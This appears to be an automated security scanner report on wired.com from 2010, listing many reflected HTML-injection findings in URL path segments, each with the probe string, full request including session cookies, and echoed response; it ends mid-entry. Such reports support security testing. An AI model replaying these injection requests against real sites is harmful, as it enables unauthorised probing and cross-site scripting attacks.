HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:01 GMT Date: Sun, 21 Nov 2010 23:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:29 GMT Date: Sun, 21 Nov 2010 23:10:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:04 GMT Date: Sun, 21 Nov 2010 23:11:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:07 GMT Date: Sun, 21 Nov 2010 23:11:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science49504"><a>10544948792 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries86976"><a>98f964069b0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:05 GMT Date: Sun, 21 Nov 2010 23:11:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:20 GMT Date: Sun, 21 Nov 2010 23:11:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:29 GMT Date: Sun, 21 Nov 2010 23:11:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1f786"><a>0483485da03"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:06 GMT Date: Sun, 21 Nov 2010 23:11:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:22 GMT Date: Sun, 21 Nov 2010 23:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:32 GMT Date: Sun, 21 Nov 2010 23:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:38 GMT Date: Sun, 21 Nov 2010 23:09:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:04 GMT Date: Sun, 21 Nov 2010 23:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:24 GMT Date: Sun, 21 Nov 2010 23:10:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:34 GMT Date: Sun, 21 Nov 2010 23:09:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:00 GMT Date: Sun, 21 Nov 2010 23:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
